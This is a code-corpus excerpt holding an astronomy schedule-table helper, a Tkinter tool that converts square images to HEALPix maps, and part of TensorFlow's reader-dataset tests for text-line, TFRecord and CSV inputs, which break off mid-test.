column_names = ["LT", "LMST", "Target", "Exposure Time", "Comments"]
markdown_sep = "---".join( ["|" for i in range(len(column_names) + 1)] )
schedule_list = [
"|{}|".format( "|".join( column_names ) ),
markdown_sep
]
for ls, lmst in zip(local_time_list, local_mean_sidereal_time_list):
ls_str = "{:02d}:{:02d}".format( int(ls.hour), int(ls.minute) )
lmst_str = "{:02d}:{:02d}:{:05.2f}".format( int(lmst[0]), int(lmst[1]), lmst[2] )
row_str = "| {:<10} | {:<10} | | | |".format(ls_str, lmst_str)
schedule_list.append(row_str)
schedule_str = "\n".join( schedule_list )
print(schedule_str)
return schedule_str
``` |
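A minimal call sketch for the schedule generator above (it assumes the `starlist.calc_time.LT2LMST` import resolves and that the module-level lists have been built as in the script; the output filename is illustrative):

```python
# Render the observing schedule as a markdown table; generate_schedule both
# prints the table and returns it as a string.
schedule_md = generate_schedule(local_time_list, local_mean_sidereal_time_list)

# Save it so it can be pasted into the observing log.
with open("observing_run_2020-03-22.md", "w") as f:
    f.write(schedule_md)
```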
{
"source": "jibanCat/Square2Healpix",
"score": 3
} |
#### File: jibanCat/Square2Healpix/Tkinter_healpy.py
```python
import sys
if sys.version_info[0] > 2:
from tkinter import *
import tkinter.filedialog as tkFileDialog
else:
from Tkinter import *
import tkFileDialog
from PIL import Image, ImageTk
import numpy as np
import matplotlib.pyplot as plt
from image2healpix import *
import matplotlib
#matplotlib.use("TkAgg")
def select_image():
global panelA, panelB, entry1
path = tkFileDialog.askopenfilename()
    try:
        deg = float(entry1.get())
        if not (0 < deg <= 180):
            print('Please enter a valid number between 0 - 180 deg.')
            return
    except ValueError:
        print('Please enter a valid number between 0 - 180 deg.')
        return
if len(path) > 0:
image_array, healpix, xsize = main(path, deg)
# panel A
image = image_array.reshape((xsize, xsize))
image = (image - image.min()) / (image.max() - image.min()) * 255
image = Image.fromarray(image.astype(np.uint8)).resize((400, 400))
image = ImageTk.PhotoImage(image)
# panel B
project = hp.mollview(healpix, xsize=400, return_projected_map=True)
#plt.close()
project[project == -np.inf] = project.max()
project = (project - project.min()) / (project.max() - project.min()) * 255
project = Image.fromarray(project.astype(np.uint8))
project = ImageTk.PhotoImage(project)
print('[Info] Creating panels')
        # initial panels
if panelA is None or panelB is None:
panelA = Label(image=image)
panelA.image = image
panelA.grid(row=2, column=0, padx=10, pady=10)
panelB = Label(image=project,)
panelB.healpix = healpix
panelB.nside = hp.npix2nside(len(healpix))
panelB.image = project
panelB.grid(row=2, column=1, padx=10, pady=10)
# or update the panels
else:
panelA.configure(image=image)
panelB.configure(image=project, )
panelA.image = image
panelB.image = project
panelB.healpix = healpix
panelB.nside = hp.npix2nside(len(healpix))
def save_file():
global panelB
output_file = tkFileDialog.asksaveasfilename()
if output_file is None:
return
save('{}.fits'.format(output_file),
panelB.healpix, write_alm=False)
def save_alm_file():
global panelB
output_file = tkFileDialog.asksaveasfilename()
if output_file is None:
return
print('[Info] Saving the alms file ... take a little while to convert image file to alms')
save(output_file + '.fits',
panelB.healpix, panelB.nside, write_alm=True)
root = Tk()
root.title('Square image to HEALPix')  # title() is a method; assigning to it would not set the window title
panelA = None
panelB = None
Label1 = Label(root, text="deg of the square (0-180): ").grid(row=0, column=0, sticky=W)
Label2 = Label(root, text="square image array (1-D): ").grid(row=0, column=1, sticky=W)
entry1 = Entry(root, )
entry1.grid(row=1, sticky=W)
# create button
save_button = Button(root, text="save the HEALPix map fits", command=save_file)
#save_button.pack(side="bottom", fill="both", expand=True, padx="2", pady="2")
save_button.grid(row=3, sticky=W)
save_alm_button = Button(root, text="save the HEALPix alm (l,m,re,im)", command=save_alm_file)
#save_alm_button.pack(side="bottom", fill="both", expand=True, padx="2", pady="2")
save_alm_button.grid(row=4, sticky=W)
button = Button(root, text="select", command=select_image)
#button.pack(side="bottom", fill="both", expand=True, padx="10", pady="10")
button.grid(row=1, column=1, sticky=W)
root.mainloop()
``` |
{
"source": "Jibanprakash/tensorflow",
"score": 2
} |
#### File: python/kernel_tests/reader_dataset_ops_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gzip
import os
import zlib
import numpy as np
from tensorflow.contrib.data.python.kernel_tests import dataset_serialization_test_base
from tensorflow.contrib.data.python.ops import readers
from tensorflow.core.example import example_pb2
from tensorflow.core.example import feature_pb2
from tensorflow.python.data.ops import iterator_ops
from tensorflow.python.data.ops import readers as core_readers
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.lib.io import python_io
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class TextLineDatasetTestBase(test.TestCase):
def _lineText(self, f, l):
return compat.as_bytes("%d: %d" % (f, l))
def _createFiles(self,
num_files,
num_lines,
crlf=False,
compression_type=None):
filenames = []
for i in range(num_files):
fn = os.path.join(self.get_temp_dir(), "text_line.%d.txt" % i)
filenames.append(fn)
contents = []
for j in range(num_lines):
contents.append(self._lineText(i, j))
# Always include a newline after the record unless it is
# at the end of the file, in which case we include it
if j + 1 != num_lines or i == 0:
contents.append(b"\r\n" if crlf else b"\n")
contents = b"".join(contents)
if not compression_type:
with open(fn, "wb") as f:
f.write(contents)
elif compression_type == "GZIP":
with gzip.GzipFile(fn, "wb") as f:
f.write(contents)
elif compression_type == "ZLIB":
contents = zlib.compress(contents)
with open(fn, "wb") as f:
f.write(contents)
else:
raise ValueError("Unsupported compression_type", compression_type)
return filenames
class TextLineDatasetSerializationTest(
TextLineDatasetTestBase,
dataset_serialization_test_base.DatasetSerializationTestBase):
def _build_iterator_graph(self, test_filenames, compression_type=None):
return core_readers.TextLineDataset(
test_filenames, compression_type=compression_type, buffer_size=10)
def testTextLineCore(self):
compression_types = [None, "GZIP", "ZLIB"]
num_files = 5
lines_per_file = 5
num_outputs = num_files * lines_per_file
for compression_type in compression_types:
test_filenames = self._createFiles(
num_files,
lines_per_file,
crlf=True,
compression_type=compression_type)
# pylint: disable=cell-var-from-loop
self.run_core_tests(
lambda: self._build_iterator_graph(test_filenames, compression_type),
lambda: self._build_iterator_graph(test_filenames), num_outputs)
# pylint: enable=cell-var-from-loop
class FixedLengthRecordReaderTestBase(test.TestCase):
def setUp(self):
super(FixedLengthRecordReaderTestBase, self).setUp()
self._num_files = 2
self._num_records = 7
self._header_bytes = 5
self._record_bytes = 3
self._footer_bytes = 2
def _record(self, f, r):
return compat.as_bytes(str(f * 2 + r) * self._record_bytes)
def _createFiles(self):
filenames = []
for i in range(self._num_files):
fn = os.path.join(self.get_temp_dir(), "fixed_length_record.%d.txt" % i)
filenames.append(fn)
with open(fn, "wb") as f:
f.write(b"H" * self._header_bytes)
for j in range(self._num_records):
f.write(self._record(i, j))
f.write(b"F" * self._footer_bytes)
return filenames
class FixedLengthRecordDatasetSerializationTest(
FixedLengthRecordReaderTestBase,
dataset_serialization_test_base.DatasetSerializationTestBase):
def _build_iterator_graph(self, num_epochs, compression_type=None):
filenames = self._createFiles()
return core_readers.FixedLengthRecordDataset(
filenames, self._record_bytes, self._header_bytes,
self._footer_bytes).repeat(num_epochs)
def testFixedLengthRecordCore(self):
num_epochs = 5
num_outputs = num_epochs * self._num_files * self._num_records
self.run_core_tests(lambda: self._build_iterator_graph(num_epochs),
lambda: self._build_iterator_graph(num_epochs * 2),
num_outputs)
class TFRecordDatasetTestBase(test.TestCase):
def setUp(self):
super(TFRecordDatasetTestBase, self).setUp()
self._num_files = 2
self._num_records = 7
self.test_filenames = self._createFiles()
self.filenames = array_ops.placeholder(dtypes.string, shape=[None])
self.num_epochs = array_ops.placeholder_with_default(
constant_op.constant(1, dtypes.int64), shape=[])
self.compression_type = array_ops.placeholder_with_default("", shape=[])
self.batch_size = array_ops.placeholder(dtypes.int64, shape=[])
repeat_dataset = core_readers.TFRecordDataset(
self.filenames, self.compression_type).repeat(self.num_epochs)
batch_dataset = repeat_dataset.batch(self.batch_size)
iterator = iterator_ops.Iterator.from_structure(batch_dataset.output_types)
self.init_op = iterator.make_initializer(repeat_dataset)
self.init_batch_op = iterator.make_initializer(batch_dataset)
self.get_next = iterator.get_next()
def _record(self, f, r):
return compat.as_bytes("Record %d of file %d" % (r, f))
def _createFiles(self):
filenames = []
for i in range(self._num_files):
fn = os.path.join(self.get_temp_dir(), "tf_record.%d.txt" % i)
filenames.append(fn)
writer = python_io.TFRecordWriter(fn)
for j in range(self._num_records):
writer.write(self._record(i, j))
writer.close()
return filenames
class TFRecordDatasetSerializationTest(
TFRecordDatasetTestBase,
dataset_serialization_test_base.DatasetSerializationTestBase):
def _build_iterator_graph(self,
num_epochs,
batch_size=1,
compression_type=None,
buffer_size=None):
filenames = self._createFiles()
if compression_type is "ZLIB":
zlib_files = []
for i, fn in enumerate(filenames):
with open(fn, "rb") as f:
cdata = zlib.compress(f.read())
zfn = os.path.join(self.get_temp_dir(), "tfrecord_%s.z" % i)
with open(zfn, "wb") as f:
f.write(cdata)
zlib_files.append(zfn)
filenames = zlib_files
    elif compression_type == "GZIP":
gzip_files = []
for i, fn in enumerate(self.test_filenames):
with open(fn, "rb") as f:
gzfn = os.path.join(self.get_temp_dir(), "tfrecord_%s.gz" % i)
with gzip.GzipFile(gzfn, "wb") as gzf:
gzf.write(f.read())
gzip_files.append(gzfn)
filenames = gzip_files
return core_readers.TFRecordDataset(
filenames, compression_type,
buffer_size=buffer_size).repeat(num_epochs).batch(batch_size)
def testTFRecordWithoutBufferCore(self):
num_epochs = 5
batch_size = num_epochs
num_outputs = num_epochs * self._num_files * self._num_records // batch_size
# pylint: disable=g-long-lambda
self.run_core_tests(
lambda: self._build_iterator_graph(num_epochs, batch_size,
buffer_size=0),
lambda: self._build_iterator_graph(num_epochs * 2, batch_size),
num_outputs)
self.run_core_tests(
lambda: self._build_iterator_graph(num_epochs, buffer_size=0), None,
num_outputs * batch_size)
# pylint: enable=g-long-lambda
def testTFRecordWithBufferCore(self):
num_epochs = 5
num_outputs = num_epochs * self._num_files * self._num_records
self.run_core_tests(lambda: self._build_iterator_graph(num_epochs),
lambda: self._build_iterator_graph(num_epochs * 2),
num_outputs)
def testTFRecordWithCompressionCore(self):
num_epochs = 5
num_outputs = num_epochs * self._num_files * self._num_records
self.run_core_tests(
lambda: self._build_iterator_graph(num_epochs, compression_type="ZLIB"),
lambda: self._build_iterator_graph(num_epochs * 2), num_outputs)
self.run_core_tests(
lambda: self._build_iterator_graph(num_epochs, compression_type="GZIP"),
lambda: self._build_iterator_graph(num_epochs * 2), num_outputs)
def _interleave(iterators, cycle_length):
pending_iterators = iterators
open_iterators = []
num_open = 0
for i in range(cycle_length):
if pending_iterators:
open_iterators.append(pending_iterators.pop(0))
num_open += 1
while num_open:
for i in range(min(cycle_length, len(open_iterators))):
if open_iterators[i] is None:
continue
try:
yield next(open_iterators[i])
except StopIteration:
if pending_iterators:
open_iterators[i] = pending_iterators.pop(0)
else:
open_iterators[i] = None
num_open -= 1
class ReadBatchFeaturesTest(test.TestCase):
def setUp(self):
super(ReadBatchFeaturesTest, self).setUp()
self._num_files = 2
self._num_records = 7
self.test_filenames = self._createFiles()
def _read_batch_features(self,
filenames,
num_epochs,
batch_size,
reader_num_threads=1,
parser_num_threads=1,
shuffle=False,
shuffle_seed=None,
drop_final_batch=False):
self.filenames = filenames
self.num_epochs = num_epochs
self.batch_size = batch_size
return readers.make_batched_features_dataset(
file_pattern=self.filenames,
batch_size=self.batch_size,
features={
"file": parsing_ops.FixedLenFeature([], dtypes.int64),
"record": parsing_ops.FixedLenFeature([], dtypes.int64),
"keywords": parsing_ops.VarLenFeature(dtypes.string)
},
reader=core_readers.TFRecordDataset,
num_epochs=self.num_epochs,
shuffle=shuffle,
shuffle_seed=shuffle_seed,
reader_num_threads=reader_num_threads,
parser_num_threads=parser_num_threads,
drop_final_batch=drop_final_batch).make_one_shot_iterator(
).get_next()
def _record(self, f, r):
example = example_pb2.Example(
features=feature_pb2.Features(
feature={
"file":
feature_pb2.Feature(
int64_list=feature_pb2.Int64List(value=[f])),
"record":
feature_pb2.Feature(
int64_list=feature_pb2.Int64List(value=[r])),
"keywords":
feature_pb2.Feature(
bytes_list=feature_pb2.BytesList(
value=self._get_keywords(f, r)))
}))
return example.SerializeToString()
def _get_keywords(self, f, r):
num_keywords = 1 + (f + r) % 2
keywords = []
for index in range(num_keywords):
keywords.append(compat.as_bytes("keyword%d" % index))
return keywords
def _createFiles(self):
filenames = []
for i in range(self._num_files):
fn = os.path.join(self.get_temp_dir(), "tf_record.%d.txt" % i)
filenames.append(fn)
writer = python_io.TFRecordWriter(fn)
for j in range(self._num_records):
writer.write(self._record(i, j))
writer.close()
return filenames
def _run_actual_batch(self, outputs, sess):
file_op = outputs["file"]
keywords_indices_op = outputs["keywords"].indices
keywords_values_op = outputs["keywords"].values
keywords_dense_shape_op = outputs["keywords"].dense_shape
record_op = outputs["record"]
return sess.run([
file_op, keywords_indices_op, keywords_values_op,
keywords_dense_shape_op, record_op
])
def _next_actual_batch(self, sess):
return self._run_actual_batch(self.outputs, sess)
def _next_expected_batch(self,
file_indices,
batch_size,
num_epochs,
cycle_length=1):
def _next_record(file_indices):
for j in file_indices:
for i in range(self._num_records):
yield j, i
def _next_record_interleaved(file_indices, cycle_length):
return _interleave([_next_record([i]) for i in file_indices],
cycle_length)
file_batch = []
keywords_batch_indices = []
keywords_batch_values = []
keywords_batch_max_len = 0
record_batch = []
batch_index = 0
for _ in range(num_epochs):
if cycle_length == 1:
next_records = _next_record(file_indices)
else:
next_records = _next_record_interleaved(file_indices, cycle_length)
for record in next_records:
f = record[0]
r = record[1]
file_batch.append(f)
record_batch.append(r)
keywords = self._get_keywords(f, r)
keywords_batch_values.extend(keywords)
keywords_batch_indices.extend(
[[batch_index, i] for i in range(len(keywords))])
batch_index += 1
keywords_batch_max_len = max(keywords_batch_max_len, len(keywords))
if len(file_batch) == batch_size:
yield [
file_batch, keywords_batch_indices, keywords_batch_values,
[batch_size, keywords_batch_max_len], record_batch
]
file_batch = []
keywords_batch_indices = []
keywords_batch_values = []
keywords_batch_max_len = 0
record_batch = []
batch_index = 0
if file_batch:
yield [
file_batch, keywords_batch_indices, keywords_batch_values,
[len(file_batch), keywords_batch_max_len], record_batch
]
def _verify_records(self,
sess,
batch_size,
file_index=None,
num_epochs=1,
interleave_cycle_length=1):
if file_index is not None:
file_indices = [file_index]
else:
file_indices = range(self._num_files)
for expected_batch in self._next_expected_batch(
file_indices, batch_size, num_epochs, interleave_cycle_length):
actual_batch = self._next_actual_batch(sess)
for i in range(len(expected_batch)):
self.assertAllEqual(expected_batch[i], actual_batch[i])
def testRead(self):
for batch_size in [1, 2]:
for num_epochs in [1, 10]:
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
# Basic test: read from file 0.
self.outputs = self._read_batch_features(
filenames=self.test_filenames[0],
num_epochs=num_epochs,
batch_size=batch_size)
self._verify_records(sess, batch_size, 0, num_epochs=num_epochs)
with self.assertRaises(errors.OutOfRangeError):
self._next_actual_batch(sess)
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
# Basic test: read from file 1.
self.outputs = self._read_batch_features(
filenames=self.test_filenames[1],
num_epochs=num_epochs,
batch_size=batch_size)
self._verify_records(sess, batch_size, 1, num_epochs=num_epochs)
with self.assertRaises(errors.OutOfRangeError):
self._next_actual_batch(sess)
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
# Basic test: read from both files.
self.outputs = self._read_batch_features(
filenames=self.test_filenames,
num_epochs=num_epochs,
batch_size=batch_size)
self._verify_records(sess, batch_size, num_epochs=num_epochs)
with self.assertRaises(errors.OutOfRangeError):
self._next_actual_batch(sess)
def testReadWithEquivalentDataset(self):
features = {
"file": parsing_ops.FixedLenFeature([], dtypes.int64),
"record": parsing_ops.FixedLenFeature([], dtypes.int64),
}
dataset = (
core_readers.TFRecordDataset(self.test_filenames)
.map(lambda x: parsing_ops.parse_single_example(x, features))
.repeat(10).batch(2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
next_element = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for file_batch, _, _, _, record_batch in self._next_expected_batch(
range(self._num_files), 2, 10):
actual_batch = sess.run(next_element)
self.assertAllEqual(file_batch, actual_batch["file"])
self.assertAllEqual(record_batch, actual_batch["record"])
with self.assertRaises(errors.OutOfRangeError):
sess.run(next_element)
def testReadWithFusedShuffleRepeatDataset(self):
num_epochs = 5
total_records = num_epochs * self._num_records
for batch_size in [1, 2]:
# Test that shuffling with same seed produces the same result.
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
outputs1 = self._read_batch_features(
filenames=self.test_filenames[0],
num_epochs=num_epochs,
batch_size=batch_size,
shuffle=True,
shuffle_seed=5)
outputs2 = self._read_batch_features(
filenames=self.test_filenames[0],
num_epochs=num_epochs,
batch_size=batch_size,
shuffle=True,
shuffle_seed=5)
for _ in range(total_records // batch_size):
batch1 = self._run_actual_batch(outputs1, sess)
batch2 = self._run_actual_batch(outputs2, sess)
for i in range(len(batch1)):
self.assertAllEqual(batch1[i], batch2[i])
# Test that shuffling with different seeds produces a different order.
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
outputs1 = self._read_batch_features(
filenames=self.test_filenames[0],
num_epochs=num_epochs,
batch_size=batch_size,
shuffle=True,
shuffle_seed=5)
outputs2 = self._read_batch_features(
filenames=self.test_filenames[0],
num_epochs=num_epochs,
batch_size=batch_size,
shuffle=True,
shuffle_seed=15)
all_equal = True
for _ in range(total_records // batch_size):
batch1 = self._run_actual_batch(outputs1, sess)
batch2 = self._run_actual_batch(outputs2, sess)
for i in range(len(batch1)):
all_equal = all_equal and np.array_equal(batch1[i], batch2[i])
self.assertFalse(all_equal)
def testParallelReadersAndParsers(self):
num_epochs = 5
for batch_size in [1, 2]:
for reader_num_threads in [2, 4]:
for parser_num_threads in [2, 4]:
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
self.outputs = self._read_batch_features(
filenames=self.test_filenames,
num_epochs=num_epochs,
batch_size=batch_size,
reader_num_threads=reader_num_threads,
parser_num_threads=parser_num_threads)
self._verify_records(
sess,
batch_size,
num_epochs=num_epochs,
interleave_cycle_length=reader_num_threads)
with self.assertRaises(errors.OutOfRangeError):
self._next_actual_batch(sess)
def testDropFinalBatch(self):
for batch_size in [1, 2]:
for num_epochs in [1, 10]:
with ops.Graph().as_default():
# Basic test: read from file 0.
self.outputs = self._read_batch_features(
filenames=self.test_filenames[0],
num_epochs=num_epochs,
batch_size=batch_size,
drop_final_batch=True)
for _, tensor in self.outputs.items():
if isinstance(tensor, ops.Tensor): # Guard against SparseTensor.
self.assertEqual(tensor.shape[0], batch_size)
class MakeCsvDatasetTest(test.TestCase):
COLUMN_TYPES = [
dtypes.int32, dtypes.int64, dtypes.float32, dtypes.float64, dtypes.string
]
COLUMNS = ["col%d" % i for i in range(len(COLUMN_TYPES))]
DEFAULT_VALS = [[], [], [], [], ["NULL"]]
DEFAULTS = [
constant_op.constant([], dtype=dtypes.int32),
constant_op.constant([], dtype=dtypes.int64),
constant_op.constant([], dtype=dtypes.float32),
constant_op.constant([], dtype=dtypes.float64),
constant_op.constant(["NULL"], dtype=dtypes.string)
]
LABEL = COLUMNS[0]
def setUp(self):
super(MakeCsvDatasetTest, self).setUp()
self._num_files = 2
self._num_records = 11
self._test_filenames = self._create_files()
def _csv_values(self, fileno, recordno):
return [
fileno,
recordno,
fileno * recordno * 0.5,
fileno * recordno + 0.5,
"record %d" % recordno if recordno % 2 == 1 else "",
]
def _write_file(self, filename, rows):
for i in range(len(rows)):
if isinstance(rows[i], list):
rows[i] = ",".join(str(v) if v is not None else "" for v in rows[i])
fn = os.path.join(self.get_temp_dir(), filename)
f = open(fn, "w")
f.write("\n".join(rows))
f.close()
return fn
def _create_file(self, fileno, header=True):
rows = []
if header:
rows.append(self.COLUMNS)
for recno in range(self._num_records):
rows.append(self._csv_values(fileno, recno))
return self._write_file("csv_file%d.csv" % fileno, rows)
def _create_files(self):
filenames = []
for i in range(self._num_files):
filenames.append(self._create_file(i))
return filenames
def _make_csv_dataset(
self,
filenames,
defaults,
column_names=COLUMNS,
label_name=LABEL,
select_cols=None,
batch_size=1,
num_epochs=1,
shuffle=False,
shuffle_seed=None,
header=True,
na_value="",
):
return readers.make_csv_dataset(
filenames,
batch_size=batch_size,
column_names=column_names,
column_defaults=defaults,
label_name=label_name,
num_epochs=num_epochs,
shuffle=shuffle,
shuffle_seed=shuffle_seed,
header=header,
na_value=na_value,
select_columns=select_cols,
)
def _next_actual_batch(self, file_indices, batch_size, num_epochs, defaults):
features = {col: list() for col in self.COLUMNS}
for _ in range(num_epochs):
for i in file_indices:
for j in range(self._num_records):
values = self._csv_values(i, j)
for n, v in enumerate(values):
if v == "": # pylint: disable=g-explicit-bool-comparison
values[n] = defaults[n][0]
values[-1] = values[-1].encode("utf-8")
# Regroup lists by column instead of row
for n, col in enumerate(self.COLUMNS):
features[col].append(values[n])
if len(list(features.values())[0]) == batch_size:
yield features
features = {col: list() for col in self.COLUMNS}
def _run_actual_batch(self, outputs, sess):
features, labels = sess.run(outputs)
batch = [features[k] for k in self.COLUMNS if k != self.LABEL]
batch.append(labels)
return batch
def _verify_records(
self,
sess,
dataset,
file_indices,
defaults=tuple(DEFAULT_VALS),
label_name=LABEL,
batch_size=1,
num_epochs=1,
):
iterator = dataset.make_one_shot_iterator()
get_next = iterator.get_next()
for expected_features in self._next_actual_batch(file_indices, batch_size,
num_epochs, defaults):
actual_features = sess.run(get_next)
if label_name is not None:
expected_labels = expected_features.pop(label_name)
# Compare labels
self.assertAllEqual(expected_labels, actual_features[1])
actual_features = actual_features[0] # Extract features dict from tuple
for k in expected_features.keys():
# Compare features
self.assertAllEqual(expected_features[k], actual_features[k])
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMakeCSVDataset(self):
defaults = self.DEFAULTS
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
# Basic test: read from file 0.
dataset = self._make_csv_dataset(self._test_filenames[0], defaults)
self._verify_records(sess, dataset, [0])
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
# Basic test: read from file 1.
dataset = self._make_csv_dataset(self._test_filenames[1], defaults)
self._verify_records(sess, dataset, [1])
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
# Read from both files.
dataset = self._make_csv_dataset(self._test_filenames, defaults)
self._verify_records(sess, dataset, range(self._num_files))
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
# Read from both files. Exercise the `batch` and `num_epochs` parameters
# of make_csv_dataset and make sure they work.
dataset = self._make_csv_dataset(
self._test_filenames, defaults, batch_size=2, num_epochs=10)
self._verify_records(
sess, dataset, range(self._num_files), batch_size=2, num_epochs=10)
def testMakeCSVDataset_withBadColumns(self):
"""Tests that exception is raised when input is malformed.
"""
dupe_columns = self.COLUMNS[:-1] + self.COLUMNS[:1]
defaults = self.DEFAULTS
# Duplicate column names
with self.assertRaises(ValueError):
self._make_csv_dataset(
self._test_filenames, defaults, column_names=dupe_columns)
# Label key not one of column names
with self.assertRaises(ValueError):
self._make_csv_dataset(
self._test_filenames, defaults, label_name="not_a_real_label")
def testMakeCSVDataset_withNoLabel(self):
"""Tests that CSV datasets can be created when no label is specified.
"""
defaults = self.DEFAULTS
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
# Read from both files. Make sure this works with no label key supplied.
dataset = self._make_csv_dataset(
self._test_filenames,
defaults,
batch_size=2,
num_epochs=10,
label_name=None)
self._verify_records(
sess,
dataset,
range(self._num_files),
batch_size=2,
num_epochs=10,
label_name=None)
def testMakeCSVDataset_withNoHeader(self):
"""Tests that datasets can be created from CSV files with no header line.
"""
defaults = self.DEFAULTS
file_without_header = self._create_file(
len(self._test_filenames), header=False)
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
dataset = self._make_csv_dataset(
file_without_header,
defaults,
batch_size=2,
num_epochs=10,
header=False,
)
self._verify_records(
sess,
dataset,
[len(self._test_filenames)],
batch_size=2,
num_epochs=10,
)
def testMakeCSVDataset_withTypes(self):
"""Tests that defaults can be a dtype instead of a Tensor for required vals.
"""
defaults = [d for d in self.COLUMN_TYPES[:-1]]
defaults.append(constant_op.constant(["NULL"], dtype=dtypes.string))
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
dataset = self._make_csv_dataset(self._test_filenames, defaults)
self._verify_records(sess, dataset, range(self._num_files))
def testMakeCSVDataset_withNoColNames(self):
"""Tests that datasets can be created when column names are not specified.
In that case, we should infer the column names from the header lines.
"""
defaults = self.DEFAULTS
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
# Read from both files. Exercise the `batch` and `num_epochs` parameters
# of make_csv_dataset and make sure they work.
dataset = self._make_csv_dataset(
self._test_filenames,
defaults,
column_names=None,
batch_size=2,
num_epochs=10)
self._verify_records(
sess, dataset, range(self._num_files), batch_size=2, num_epochs=10)
def testMakeCSVDataset_withTypeInferenceMismatch(self):
# Test that error is thrown when num fields doesn't match columns
with self.assertRaises(ValueError):
self._make_csv_dataset(
self._test_filenames,
column_names=self.COLUMNS + ["extra_name"],
defaults=None,
batch_size=2,
num_epochs=10)
def testMakeCSVDataset_withTypeInference(self):
"""Tests that datasets can be created when no defaults are specified.
In that case, we should infer the types from the first N records.
"""
# Test that it works with standard test files (with header, etc)
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
dataset = self._make_csv_dataset(
self._test_filenames, defaults=None, batch_size=2, num_epochs=10)
self._verify_records(
sess,
dataset,
range(self._num_files),
batch_size=2,
num_epochs=10,
defaults=[[], [], [], [], [""]])
def testMakeCSVDataset_withTypeInferenceTricky(self):
# Test on a deliberately tricky file (type changes as we read more rows, and
# there are null values)
fn = os.path.join(self.get_temp_dir(), "file.csv")
expected_dtypes = [
dtypes.int32, dtypes.int64, dtypes.float32, dtypes.float32,
dtypes.string, dtypes.string
]
col_names = ["col%d" % i for i in range(len(expected_dtypes))]
rows = [[None, None, None, "NAN", "",
"a"], [1, 2**31 + 1, 2**64, 123, "NAN", ""],
['"123"', 2, 2**64, 123.4, "NAN", '"cd,efg"']]
expected = [[0, 0, 0, 0, "", "a"], [1, 2**31 + 1, 2**64, 123, "", ""],
[123, 2, 2**64, 123.4, "", "cd,efg"]]
for row in expected:
row[-1] = row[-1].encode("utf-8") # py3 expects byte strings
row[-2] = row[-2].encode("utf-8") # py3 expects byte strings
self._write_file("file.csv", [col_names] + rows)
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
dataset = self._make_csv_dataset(
fn,
defaults=None,
column_names=None,
label_name=None,
na_value="NAN",
)
features = dataset.make_one_shot_iterator().get_next()
# Check that types match
for i in range(len(expected_dtypes)):
print(features["col%d" % i].dtype, expected_dtypes[i])
assert features["col%d" % i].dtype == expected_dtypes[i]
for i in range(len(rows)):
assert sess.run(features) == dict(zip(col_names, expected[i]))
def testMakeCSVDataset_withTypeInferenceAllTypes(self):
# Test that we make the correct inference for all types with fallthrough
fn = os.path.join(self.get_temp_dir(), "file.csv")
expected_dtypes = [
dtypes.int32, dtypes.int64, dtypes.float32, dtypes.float64,
dtypes.string, dtypes.string
]
col_names = ["col%d" % i for i in range(len(expected_dtypes))]
rows = [[1, 2**31 + 1, 1.0, 4e40, "abc", ""]]
expected = [[
1, 2**31 + 1, 1.0, 4e40, "abc".encode("utf-8"), "".encode("utf-8")
]]
self._write_file("file.csv", [col_names] + rows)
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
dataset = self._make_csv_dataset(
fn,
defaults=None,
column_names=None,
label_name=None,
na_value="NAN",
)
features = dataset.make_one_shot_iterator().get_next()
# Check that types match
for i in range(len(expected_dtypes)):
self.assertAllEqual(features["col%d" % i].dtype, expected_dtypes[i])
for i in range(len(rows)):
self.assertAllEqual(
sess.run(features), dict(zip(col_names, expected[i])))
def testMakeCSVDataset_withSelectColsError(self):
data = [[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]]
col_names = ["col%d" % i for i in range(5)]
fn = self._write_file("file.csv", [col_names] + data)
with self.assertRaises(ValueError):
# Mismatch in number of defaults and number of columns selected,
# should raise an error
self._make_csv_dataset(
fn,
defaults=[[0]] * 5,
column_names=col_names,
label_name=None,
select_cols=[1, 3])
with self.assertRaises(ValueError):
# Invalid column name should raise an error
self._make_csv_dataset(
fn,
defaults=[[0]],
column_names=col_names,
label_name=None,
select_cols=["invalid_col_name"])
def testMakeCSVDataset_withSelectCols(self):
data = [[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]]
col_names = ["col%d" % i for i in range(5)]
fn = self._write_file("file.csv", [col_names] + data)
# If select_cols is specified, should only yield a subset of columns
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
dataset = self._make_csv_dataset(
fn,
defaults=[[0], [0]],
column_names=col_names,
label_name=None,
select_cols=[1, 3])
expected = [[1, 3], [6, 8]]
features = dataset.make_one_shot_iterator().get_next()
for i in range(len(data)):
self.assertAllEqual(
sess.run(features),
dict(zip([col_names[1], col_names[3]], expected[i])))
# Can still do default inference with select_cols
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
dataset = self._make_csv_dataset(
fn,
defaults=None,
column_names=col_names,
label_name=None,
select_cols=[1, 3])
expected = [[1, 3], [6, 8]]
features = dataset.make_one_shot_iterator().get_next()
for i in range(len(data)):
self.assertAllEqual(
sess.run(features),
dict(zip([col_names[1], col_names[3]], expected[i])))
# Can still do column name inference
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
